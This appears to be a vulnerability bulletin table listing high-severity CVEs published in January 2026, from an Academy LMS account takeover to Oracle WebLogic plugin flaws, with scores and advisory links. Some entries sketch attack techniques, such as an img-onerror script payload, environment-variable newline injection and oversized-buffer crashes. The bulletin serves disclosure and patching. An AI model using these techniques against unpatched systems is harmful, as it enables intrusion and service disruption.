| kodezen--Academy LMS WordPress LMS Plugin for Complete eLearning Solution | The Academy LMS - WordPress LMS Plugin for Complete eLearning Solution plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.5.0. This is due to the plugin not properly validating a user's identity prior to updating their password and relying solely on a publicly-exposed nonce for authorization. This makes it possible for unauthenticated attackers to change an arbitrary user's password, including an administrator's, and gain access to that account. | 2026-01-21 | 9.8 | CVE-2025-15521 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6687ebbe-fdf4-4ecb-bf59-034bb4b0104c?source=cve https://plugins.trac.wordpress.org/browser/academy/tags/3.5.0/includes/functions.php#L1581 |
| kohler--hotcrp | HotCRP is conference review software. A problem introduced in April 2024 in version 3.1 led to inadequately sanitized code generation for HotCRP formulas which allowed users to trigger the execution of arbitrary PHP code. The problem is patched in release version 3.2. | 2026-01-19 | 10 | CVE-2026-23836 | https://github.com/kohler/hotcrp/security/advisories/GHSA-hpqh-j6qx-x57h https://github.com/kohler/hotcrp/commit/4674fcfbb76511072a1145dad620756fc1d4b4e9 https://github.com/kohler/hotcrp/commit/bfc7e0db15df6ed6d544a639020d2ce05a5f0834 |
| Kozea--WeasyPrint | WeasyPrint helps web developers to create PDF documents. Prior to version 68.0, a server-side request forgery (SSRF) protection bypass exists in WeasyPrint's `default_url_fetcher`. The vulnerability allows attackers to access internal network resources (such as `localhost` services or cloud metadata endpoints) even when a developer has implemented a custom `url_fetcher` to block such access. This occurs because the underlying `urllib` library follows HTTP redirects automatically without re-validating the new destination against the developer's security policy. Version 68.0 contains a patch for the issue. | 2026-01-19 | 7.5 | CVE-2025-68616 | https://github.com/Kozea/WeasyPrint/security/advisories/GHSA-983w-rhvv-gwmv https://github.com/Kozea/WeasyPrint/commit/b6a14f0f3f4ce9c0c75c1a2d73cb1c5d43f0e565 |
| laravel--reverb | Laravel Reverb provides a real-time WebSocket communication backend for Laravel applications. In versions 1.6.3 and below, Reverb passes data from the Redis channel directly into PHP's unserialize() function without restricting which classes can be instantiated, which leaves users vulnerable to Remote Code Execution. The exploitability of this vulnerability is increased because Redis servers are commonly deployed without authentication, but only affects Laravel Reverb when horizontal scaling is enabled (REVERB_SCALING_ENABLED=true). This issue has been fixed in version 1.7.0. As a workaround, require a strong password for Redis access and ensure the service is only accessible via a private network or local loopback, and/or set REVERB_SCALING_ENABLED=false to bypass the vulnerable logic entirely (if the environment uses only one Reverb node). | 2026-01-21 | 9.8 | CVE-2026-23524 | https://github.com/laravel/reverb/security/advisories/GHSA-m27r-m6rx-mhm4 https://github.com/laravel/reverb/commit/9ec26f8ffbb701f84920dd0bb9781a1797591f1a https://cwe.mitre.org/data/definitions/502.html https://github.com/laravel/reverb/releases/tag/v1.7.0 https://laravel.com/docs/12.x/reverb#scaling |
| leepeuker--movary | Movary is a web application to track, rate and explore your movie watch history. Due to insufficient input validation, attackers can trigger cross-site scripting payloads in versions prior to 0.70.0. The vulnerable parameter is `?categoryUpdated=`. Version 0.70.0 fixes the issue. | 2026-01-19 | 9.3 | CVE-2026-23839 | https://github.com/leepeuker/movary/security/advisories/GHSA-v32w-5qx7-p3vq https://github.com/leepeuker/movary/blob/main/public/js/settings-account-location.js#L237 https://github.com/leepeuker/movary/releases/tag/0.70.0 |
| leepeuker--movary | Movary is a web application to track, rate and explore your movie watch history. Due to insufficient input validation, attackers can trigger cross-site scripting payloads in versions prior to 0.70.0. The vulnerable parameter is `?categoryDeleted=`. Version 0.70.0 fixes the issue. | 2026-01-19 | 9.3 | CVE-2026-23840 | https://github.com/leepeuker/movary/security/advisories/GHSA-pj3m-gmq8-2r57 https://github.com/leepeuker/movary/blob/main/public/js/settings-account-location.js#L204 https://github.com/leepeuker/movary/releases/tag/0.70.0 |
| leepeuker--movary | Movary is a web application to track, rate and explore your movie watch history. Due to insufficient input validation, attackers can trigger cross-site scripting payloads in versions prior to 0.70.0. The vulnerable parameter is `?categoryCreated=`. Version 0.70.0 fixes the issue. | 2026-01-19 | 9.3 | CVE-2026-23841 | https://github.com/leepeuker/movary/security/advisories/GHSA-v877-x568-4v5v https://github.com/leepeuker/movary/releases/tag/0.70.0 |
| LiteSpeed Technologies Inc--LiteSpeed Web Server Enterprise | LiteSpeed Web Server Enterprise 5.4.11 contains an authenticated command injection vulnerability in the external app configuration interface. Authenticated administrators can inject shell commands through the 'Command' parameter in the server configuration, allowing remote code execution via path traversal and bash command injection. | 2026-01-23 | 8.8 | CVE-2021-47903 | ExploitDB-49523 LiteSpeed Technologies Official Homepage LiteSpeed Web Server Product Page VulnCheck Advisory: LiteSpeed Web Server Enterprise 5.4.11 - Command Injection |
| LiteSpeed Technologies--OpenLiteSpeed | Openlitespeed 1.7.9 contains a stored cross-site scripting vulnerability in the dashboard's Notes parameter that allows administrators to inject malicious scripts. Attackers can craft a payload in the Notes field during listener configuration that will execute when an administrator clicks on the Default Icon. | 2026-01-21 | 7.2 | CVE-2021-47855 | ExploitDB-49727 OpenLiteSpeed Vendor Homepage VulnCheck Advisory: Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting |
| Luidia--eBeam Education Suite | eBeam Education Suite 2.5.0.9 contains an unquoted service path vulnerability in the eBeam Device Service that allows local users to potentially execute code with elevated privileges. Attackers can exploit the unquoted path in the service configuration to inject malicious code that would execute with LocalSystem privileges during service startup. | 2026-01-21 | 7.8 | CVE-2021-47878 | ExploitDB-49647 Software Download Page VulnCheck Advisory: eBeam Education Suite 2.5.0.9 - 'eBeam Device Service' Unquoted Service Path |
| Luidia--eBeam Interactive Suite | eBeam Interactive Suite 3.6 contains an unquoted service path vulnerability in the eBeam Stylus Driver service that allows local users to potentially execute code with elevated privileges. Attackers can exploit the unquoted path in C:\Program Files (x86)\Luidia\eBeam Stylus Driver\ to inject malicious executables that would run with LocalSystem permissions. | 2026-01-21 | 7.8 | CVE-2021-47879 | ExploitDB-49648 Software Download Page VulnCheck Advisory: eBeam Interactive Suite 3.6 - 'eBeam Stylus Driver' Unquoted Service Path |
| lxc--incus | Incus is a system container and virtual machine manager. In versions 6.20.0 and below, a user with the ability to launch a container with a custom YAML configuration (e.g., a member of the 'incus' group) can create an environment variable containing newlines, which can be used to add additional configuration items to the container's lxc.conf due to newline injection. This can allow adding arbitrary lifecycle hooks, ultimately resulting in arbitrary command execution on the host. Exploiting this issue on IncusOS requires a slight modification of the payload to change to a different writable directory for the validation step (e.g., /tmp). This can be confirmed with a second container with /tmp mounted from the host (a privileged action for validation only). A fix is planned for versions 6.0.6 and 6.21.0, but they have not been released at the time of publication. | 2026-01-22 | 8.7 | CVE-2026-23953 | https://github.com/lxc/incus/security/advisories/GHSA-x6jc-phwx-hp32 https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L1081 https://github.com/user-attachments/files/24473682/environment_newline_injection.sh https://github.com/user-attachments/files/24473685/environment_newline_injection.patch |
| lxc--incus | Incus is a system container and virtual machine manager. Versions 6.21.0 and below allow a user with the ability to launch a container with a custom image (e.g., a member of the 'incus' group) to use directory traversal or symbolic links in the templating functionality to achieve arbitrary file read and arbitrary file write on the host. This ultimately results in arbitrary command execution on the host. When using an image with a metadata.yaml containing templates, neither the source nor the target paths are checked for symbolic links or directory traversal. This can also be exploited on IncusOS. A fix is planned for versions 6.0.6 and 6.21.0, but they have not been released at the time of publication. | 2026-01-22 | 8.7 | CVE-2026-23954 | https://github.com/lxc/incus/security/advisories/GHSA-7f67-crqm-jgh7 https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7215 https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7294 https://github.com/user-attachments/files/24473599/template_arbitrary_write.sh https://github.com/user-attachments/files/24473601/templates_arbitrary_write.patch |
| lxsmnsyc--seroval | seroval facilitates JS value stringification, including complex structures beyond JSON.stringify capabilities. In versions 1.4.0 and below, due to improper input validation, a malicious object key can lead to prototype pollution during JSON deserialization. This vulnerability affects only JSON deserialization functionality. This issue is fixed in version 1.4.1. | 2026-01-21 | 7.3 | CVE-2026-23736 | https://github.com/lxsmnsyc/seroval/security/advisories/GHSA-hj76-42vx-jwp4 https://github.com/lxsmnsyc/seroval/commit/ce9408ebc87312fcad345a73c172212f2a798060 |
| lxsmnsyc--seroval | seroval facilitates JS value stringification, including complex structures beyond JSON.stringify capabilities. In versions 1.4.0 and below, improper input handling in the JSON deserialization component can lead to arbitrary JavaScript code execution. Exploitation is possible via overriding constant values and error deserialization, allowing indirect access to unsafe JS evaluation. At minimum, attackers need the ability to perform 4 separate requests against the same function, and partial knowledge of how the serialized data is used during later runtime processing. This vulnerability affects the fromJSON and fromCrossJSON functions in a client-to-server transmission scenario. This issue has been fixed in version 1.4.1. | 2026-01-21 | 7.5 | CVE-2026-23737 | https://github.com/lxsmnsyc/seroval/security/advisories/GHSA-3rxj-6cgf-8cfw https://github.com/lxsmnsyc/seroval/commit/ce9408ebc87312fcad345a73c172212f2a798060 |
| lxsmnsyc--seroval | seroval facilitates JS value stringification, including complex structures beyond JSON.stringify capabilities. In versions 1.4.0 and below, overriding RegExp serialization with extremely large patterns can exhaust JavaScript runtime memory during deserialization. Additionally, overriding RegExp serialization with patterns that trigger catastrophic backtracking can lead to ReDoS (Regular Expression Denial of Service). This issue has been fixed in version 1.4.1. | 2026-01-22 | 7.5 | CVE-2026-23956 | https://github.com/lxsmnsyc/seroval/security/advisories/GHSA-hx9m-jf43-8ffr https://github.com/lxsmnsyc/seroval/commit/ce9408ebc87312fcad345a73c172212f2a798060 |
| lxsmnsyc--seroval | seroval facilitates JS value stringification, including complex structures beyond JSON.stringify capabilities. In versions 1.4.0 and below, overriding encoded array lengths by replacing them with an excessively large value causes the deserialization process to significantly increase processing time. This issue has been fixed in version 1.4.1. | 2026-01-22 | 7.5 | CVE-2026-23957 | https://github.com/lxsmnsyc/seroval/security/advisories/GHSA-66fc-rw6m-c2q6 https://github.com/lxsmnsyc/seroval/commit/ce9408ebc87312fcad345a73c172212f2a798060 |
| lxsmnsyc--seroval | Seroval facilitates JS value stringification, including complex structures beyond JSON.stringify capabilities. In versions 1.4.0 and below, serialization of objects with extreme depth can exceed the maximum call stack limit. In version 1.4.1, Seroval introduces a `depthLimit` parameter in serialization/deserialization methods. An error will be thrown if the depth limit is reached. | 2026-01-22 | 7.5 | CVE-2026-24006 | https://github.com/lxsmnsyc/seroval/security/advisories/GHSA-3j22-8qj3-26mx https://github.com/lxsmnsyc/seroval/commit/ce9408ebc87312fcad345a73c172212f2a798060 |
| MacPaw Way Ltd.--Encrypto | MacPaw Encrypto 1.0.1 contains an unquoted service path vulnerability in its Encrypto Service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in C:\Program Files\Encrypto\ to inject malicious executables and escalate privileges on Windows systems. | 2026-01-21 | 7.8 | CVE-2021-47863 | ExploitDB-49694 MacPaw Encrypto Official Homepage VulnCheck Advisory: MacPaw Encrypto 1.0.1 - 'Encrypto Service' Unquoted Service Path |
| Magic Utilities--Magic Mouse 2 utilities | Magic Mouse 2 Utilities 2.20 contains an unquoted service path vulnerability in its Windows service configuration. Attackers can exploit the unquoted path to inject malicious executables and gain elevated system privileges by placing a malicious file in the service path. | 2026-01-25 | 7.8 | CVE-2020-36936 | ExploitDB-49017 Magic Utilities Vendor Homepage VulnCheck Advisory: Magic Mouse 2 utilities 2.20 - 'magicmouse2service' Unquoted Service Path |
| mastodon--mastodon | Mastodon is a free, open-source social network server based on ActivityPub. Mastodon versions before v4.3.18, v4.4.12, and v4.5.5 do not have a limit on the maximum number of poll options for remote posts, allowing attackers to create polls with a very large amount of options, greatly increasing resource consumption. Depending on the number of poll options, an attacker can cause disproportionate resource usage in both Mastodon servers and clients, potentially causing Denial of Service either server-side or client-side. Mastodon versions v4.5.5, v4.4.12, v4.3.18 are patched. | 2026-01-22 | 7.5 | CVE-2026-23962 | https://github.com/mastodon/mastodon/security/advisories/GHSA-gg8q-rcg7-p79g https://github.com/mastodon/mastodon/releases/tag/v4.3.18 https://github.com/mastodon/mastodon/releases/tag/v4.4.12 https://github.com/mastodon/mastodon/releases/tag/v4.5.5 |
| MedDream--MedDream PACS Premium | An arbitrary file read vulnerability exists in the encapsulatedDoc functionality of MedDream PACS Premium 7.3.6.870. A specially crafted HTTP request can lead to an arbitrary file read; an attacker can send an HTTP request to trigger this vulnerability. | 2026-01-20 | 9.6 | CVE-2025-53912 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2273 |
| melapress--Melapress Role Editor | The Melapress Role Editor plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.1.1. This is due to a misconfigured capability check on the 'save_secondary_roles_field' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to assign themselves additional roles including Administrator. | 2026-01-23 | 8.8 | CVE-2025-14866 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0509aaf1-8aae-42e5-84d3-ea9b431703f3?source=cve https://plugins.trac.wordpress.org/browser/melapress-role-editor/tags/1.1.0/classes/admin/ajax/class-admin-ajax.php https://plugins.trac.wordpress.org/browser/melapress-role-editor/tags/1.1.0/classes/admin/additional-form-fields/class-user-profile.php#L103 https://plugins.trac.wordpress.org/changeset/3439348/ |
| Microsoft--Azure Data Explorer | Exposure of sensitive information to an unauthorized actor in Azure Data Explorer allows an unauthorized attacker to disclose information over a network. | 2026-01-22 | 7.4 | CVE-2026-21524 | Azure Data Explorer Information Disclosure Vulnerability |
| Microsoft--Azure Front Door | Improper access control in Azure Front Door (AFD) allows an unauthorized attacker to elevate privileges over a network. | 2026-01-22 | 9.8 | CVE-2026-24306 | Azure Front Door Elevation of Privilege Vulnerability |
| Microsoft--Azure Logic Apps | Improper limitation of a pathname to a restricted directory ('path traversal') in Azure Logic Apps allows an unauthorized attacker to elevate privileges over a network. | 2026-01-22 | 8.2 | CVE-2026-21227 | Azure Logic Apps Elevation of Privilege Vulnerability |
| Microsoft--Azure Resource Manager | Improper access control in Azure Resource Manager allows an authorized attacker to elevate privileges over a network. | 2026-01-23 | 9.9 | CVE-2026-24304 | Azure Resource Manager Elevation of Privilege Vulnerability |
| Microsoft--Microsoft 365 Copilot | Improper validation of specified type of input in M365 Copilot allows an unauthorized attacker to disclose information over a network. | 2026-01-22 | 9.3 | CVE-2026-24307 | M365 Copilot Information Disclosure Vulnerability |
| Microsoft--Microsoft 365 Word Copilot | Improper neutralization of escape, meta, or control sequences in Copilot allows an unauthorized attacker to disclose information over a network. | 2026-01-22 | 7.4 | CVE-2026-21521 | Word Copilot Information Disclosure Vulnerability |
| Microsoft--Microsoft Account | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Account allows an unauthorized attacker to perform spoofing over a network. | 2026-01-22 | 9.3 | CVE-2026-21264 | Microsoft Account Spoofing Vulnerability |
| Microsoft--Microsoft Copilot Studio | Exposure of sensitive information to an unauthorized actor in Copilot Studio allows an unauthenticated attacker to view sensitive information over a network. | 2026-01-22 | 7.5 | CVE-2026-21520 | Copilot Studio Information Disclosure Vulnerability |
| Microsoft--Microsoft Entra | Azure Entra ID Elevation of Privilege Vulnerability | 2026-01-22 | 9.3 | CVE-2026-24305 | Azure Entra ID Elevation of Privilege Vulnerability |
| Microvirt--MEMU PLAY | Microvirt MEMU Play 3.7.0 contains an unquoted service path vulnerability in the MEmusvc Windows service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path to inject malicious executables that will be run with elevated LocalSystem privileges. | 2026-01-25 | 7.8 | CVE-2020-36937 | ExploitDB-49016 Official MEMU Play Product Homepage VulnCheck Advisory: MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path |
| Moodle--Moodle | A flaw was found in Moodle. An attacker with access to the restore interface could trigger server-side execution of arbitrary code. This is due to insufficient validation of restore input, which leads to unintended interpretation by core restore routines. Successful exploitation could result in a full compromise of the Moodle application. | 2026-01-23 | 8.8 | CVE-2025-67847 | https://access.redhat.com/security/cve/CVE-2025-67847 |
| Moodle--Moodle | Moodle 3.10.3 contains a persistent cross-site scripting vulnerability in the calendar event subtitle field that allows attackers to inject malicious scripts. Attackers can craft a calendar event with malicious JavaScript in the subtitle track label to execute arbitrary code when users view the event. | 2026-01-21 | 7.2 | CVE-2021-47857 | ExploitDB-49714 Official Moodle Project Homepage VulnCheck Advisory: Moodle 3.10.3 - 'label' Persistent Cross Site Scripting |
| nanbingxyz--5ire | 5ire is a cross-platform desktop artificial intelligence assistant and model context protocol client. Prior to version 0.15.3, unsafe HTML rendering permits untrusted HTML (including on* event attributes) to execute in the renderer context. An attacker can inject an `<img onerror=...>` payload to run arbitrary JavaScript in the renderer, which can call exposed bridge APIs such as `window.bridge.mcpServersManager.createServer`. This enables unauthorized creation of MCP servers and can lead to remote command execution. Version 0.15.3 fixes the issue. | 2026-01-21 | 9.7 | CVE-2026-22792 | https://github.com/nanbingxyz/5ire/security/advisories/GHSA-p5fm-wm8g-rffx https://github.com/nanbingxyz/5ire/releases/tag/v0.15.3 |
| nanbingxyz--5ire | 5ire is a cross-platform desktop artificial intelligence assistant and model context protocol client. Prior to version 0.15.3, an unsafe option parsing vulnerability in the ECharts Markdown plugin allows any user able to submit ECharts code blocks to execute arbitrary JavaScript code in the renderer context. This can lead to Remote Code Execution (RCE) in environments where privileged APIs (such as Electron's electron.mcp) are exposed, resulting in full compromise of the host system. Version 0.15.3 patches the issue. | 2026-01-21 | 9.7 | CVE-2026-22793 | https://github.com/nanbingxyz/5ire/security/advisories/GHSA-wg3x-7c26-97wj https://github.com/nanbingxyz/5ire/releases/tag/v0.15.3 |
| NodeBB--NodeBB Plugin Emoji | NodeBB Plugin Emoji 3.2.1 contains an arbitrary file write vulnerability that allows administrative users to write files to arbitrary system locations through the emoji upload API. Attackers with admin access can craft file upload requests with directory traversal to overwrite system files by manipulating the file path parameter. | 2026-01-21 | 7.5 | CVE-2021-47746 | ExploitDB-49813 Official NodeBB Homepage NodeBB Emoji Plugin GitHub Repository VulnCheck Advisory: NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write |
| Northwest Performance Software, Inc.--Managed Switch Port Mapping Tool | Managed Switch Port Mapping Tool 2.85.2 contains a denial of service vulnerability that allows attackers to crash the application by creating an oversized buffer. Attackers can generate a 10,000-character buffer and paste it into the IP Address and SNMP Community Name fields to trigger the application crash. | 2026-01-23 | 7.5 | CVE-2021-47894 | ExploitDB-49566 Vendor Homepage Software Download Page VulnCheck Advisory: Managed Switch Port Mapping Tool 2.85.2 - Denial of Service |
| Nsauditor--Nsauditor | Nsauditor 3.2.2.0 contains a denial of service vulnerability that allows attackers to crash the application by overwriting the Event Description field with a large buffer. Attackers can generate a 10,000-character 'U' buffer and paste it into the Event Description field to trigger an application crash. | 2026-01-23 | 7.5 | CVE-2021-47895 | ExploitDB-49568 Official Vendor Homepage VulnCheck Advisory: Nsauditor 3.2.2.0 - 'Event Description' Denial of Service |
| NVIDIA--CUDA Toolkit | NVIDIA Nsight Systems contains a vulnerability in the gfx_hotspot recipe, where an attacker could cause an OS command injection by supplying a malicious string to the process_nsys_rep_cli.py script if the script is invoked manually. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure. | 2026-01-20 | 7.3 | CVE-2025-33228 | https://nvd.nist.gov/vuln/detail/CVE-2025-33228 https://www.cve.org/CVERecord?id=CVE-2025-33228 https://nvidia.custhelp.com/app/answers/detail/a_id/5755 |
| NVIDIA--CUDA Toolkit | NVIDIA Nsight Visual Studio for Windows contains a vulnerability in Nsight Monitor where an attacker can execute arbitrary code with the same privileges as the NVIDIA Nsight Visual Studio Edition Monitor application. A successful exploit of this vulnerability may lead to escalation of privileges, code execution, data tampering, denial of service, and information disclosure. | 2026-01-20 | 7.3 | CVE-2025-33229 | https://nvd.nist.gov/vuln/detail/CVE-2025-33229 https://www.cve.org/CVERecord?id=CVE-2025-33229 https://nvidia.custhelp.com/app/answers/detail/a_id/5755 |
| NVIDIA--CUDA Toolkit | NVIDIA Nsight Systems for Linux contains a vulnerability in the .run installer, where an attacker could cause an OS command injection by supplying a malicious string to the installation path. A successful exploit of this vulnerability might lead to escalation of privileges, code execution, data tampering, denial of service, and information disclosure. | 2026-01-20 | 7.3 | CVE-2025-33230 | https://nvd.nist.gov/vuln/detail/CVE-2025-33230 https://www.cve.org/CVERecord?id=CVE-2025-33230 https://nvidia.custhelp.com/app/answers/detail/a_id/5755 |
| NVIDIA--Merlin Transformers4Rec | NVIDIA Merlin Transformers4Rec for all platforms contains a vulnerability where an attacker could cause code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering. | 2026-01-20 | 7.8 | CVE-2025-33233 | https://nvd.nist.gov/vuln/detail/CVE-2025-33233 https://www.cve.org/CVERecord?id=CVE-2025-33233 https://nvidia.custhelp.com/app/answers/detail/a_id/5761 |
| OKI--Configuration Tool | OKI Configuration Tool 1.6.53 contains an unquoted service path vulnerability in the OKI Local Port Manager service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files\Okidata\Common\extend3\portmgrsrv.exe' to inject malicious executables and escalate privileges. | 2026-01-21 | 7.8 | CVE-2021-47884 | ExploitDB-49624 Archived OKI Product Webpage VulnCheck Advisory: Configuration Tool 1.6.53 - 'OpLclSrv' Unquoted Service Path |
| OKI--Print Job Accounting | OKI Print Job Accounting 4.4.10 contains an unquoted service path vulnerability in the OkiJaSvc service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files\Okidata\Print Job Accounting\' to inject malicious executables and escalate privileges. | 2026-01-21 | 7.8 | CVE-2021-47887 | ExploitDB-49623 Archived OKI Product Webpage VulnCheck Advisory: Print Job Accounting 4.4.10 - 'OkiJaSvc' Unquoted Service Path |
| OpenStack--keystonemiddleware | An issue was discovered in OpenStack keystonemiddleware 10.5 through 10.7 before 10.7.2, 10.8 and 10.9 before 10.9.1, and 10.10 through 10.12 before 10.12.1. The external_oauth2_token middleware fails to sanitize incoming authentication headers before processing OAuth 2.0 tokens. By sending forged identity headers such as X-Is-Admin-Project, X-Roles, or X-User-Id, an authenticated attacker may escalate privileges or impersonate other users. All deployments using the external_oauth2_token middleware are affected. | 2026-01-19 | 9.9 | CVE-2026-22797 | https://launchpad.net/bugs/2129018 https://www.openwall.com/lists/oss-security/2026/01/16/9 |
| opf--openproject | OpenProject is an open-source, web-based project management software. Versions 16.3.0 through 16.6.4 are affected by a stored cross-site scripting vulnerability in the Roadmap view. OpenProject's roadmap view renders the "Related work packages" list for each version. When a version contains work packages from a different project (e.g., a subproject), the helper link_to_work_package prepends package.project.to_s to the link and returns the entire string with .html_safe. Because project names are user-controlled and no escaping happens before calling html_safe, any HTML placed in a subproject name is injected verbatim into the page. The underlying issue is mitigated in versions 16.6.5 and 17.0.0 by setting an `X-Content-Type-Options: nosniff` header. That header had been in place until a refactoring to the Rails standard content-security-policy configuration, which has not properly applied it since OpenProject 16.3.0. Those who cannot upgrade their installations should ensure that their proxying web server adds an `X-Content-Type-Options: nosniff` header. | 2026-01-19 | 8.7 | CVE-2026-23625 | https://github.com/opf/openproject/security/advisories/GHSA-cvpq-cc56-gwxx https://github.com/opf/openproject/releases/tag/v16.6.5 https://github.com/opf/openproject/releases/tag/v17.0.0 |
| Oracle Corporation--Oracle Agile PLM | Vulnerability in the Oracle Agile PLM product of Oracle Supply Chain (component: User and User Group). The supported version that is affected is 9.3.6. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Agile PLM. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Agile PLM accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). | 2026-01-20 | 7.5 | CVE-2026-21940 | Oracle Advisory |
| Oracle Corporation--Oracle Agile Product Lifecycle Management for Process | Vulnerability in the Oracle Agile Product Lifecycle Management for Process product of Oracle Supply Chain (component: Supplier Portal). The supported version that is affected is 6.2.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Agile Product Lifecycle Management for Process. Successful attacks of this vulnerability can result in takeover of Oracle Agile Product Lifecycle Management for Process. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). | 2026-01-20 | 9.8 | CVE-2026-21969 | Oracle Advisory |
| Oracle Corporation--Oracle Business Intelligence Enterprise Edition | Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Oracle Analytics Cloud). Supported versions that are affected are 7.6.0.0.0 and 8.2.0.0.0. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Business Intelligence Enterprise Edition executes to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N). | 2026-01-20 | 7.1 | CVE-2026-21976 | Oracle Advisory |
| Oracle Corporation--Oracle Database Server | Vulnerability in the SQLcl component of Oracle Database Server. Supported versions that are affected are 23.4.0-23.26.0. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where SQLcl executes to compromise SQLcl. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of SQLcl. CVSS 3.1 Base Score 7.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H). | 2026-01-20 | 7 | CVE-2026-21939 | Oracle Advisory |
| Oracle Corporation--Oracle FLEXCUBE Investor Servicing | Vulnerability in the Oracle FLEXCUBE Investor Servicing product of Oracle Financial Services Applications (component: Security Management System). Supported versions that are affected are 14.5.0.15.0, 14.7.0.8.0 and 14.8.0.1.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle FLEXCUBE Investor Servicing. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle FLEXCUBE Investor Servicing accessible data as well as unauthorized access to critical data or complete access to all Oracle FLEXCUBE Investor Servicing accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N). | 2026-01-20 | 8.1 | CVE-2026-21973 | Oracle Advisory |
| Oracle Corporation--Oracle Hospitality OPERA 5 | Vulnerability in the Oracle Hospitality OPERA 5 product of Oracle Hospitality Applications (component: Opera Servlet). Supported versions that are affected are 5.6.19.23, 5.6.25.17, 5.6.26.10 and 5.6.27.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality OPERA 5. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Hospitality OPERA 5 accessible data as well as unauthorized update, insert or delete access to some of Oracle Hospitality OPERA 5 accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Hospitality OPERA 5. CVSS 3.1 Base Score 8.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L). | 2026-01-20 | 8.6 | CVE-2026-21967 | Oracle Advisory |
| Oracle Corporation--Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in | Vulnerability in the Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in product of Oracle Fusion Middleware (component: Weblogic Server Proxy Plug-in for Apache HTTP Server, Weblogic Server Proxy Plug-in for IIS). Supported versions that are affected are 12.2.1.4.0, 14.1.1.0.0 and 14.1.2.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in. While the vulnerability is in Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in accessible data as well as unauthorized access to critical data or complete access to all Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in accessible data. Note: Affected version for Weblogic Server Proxy Plug-in for IIS is 12.2.1.4.0 only. CVSS 3.1 Base Score 10.0 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N). | 2026-01-20 | 10 | CVE-2026-21962 | Oracle Advisory |
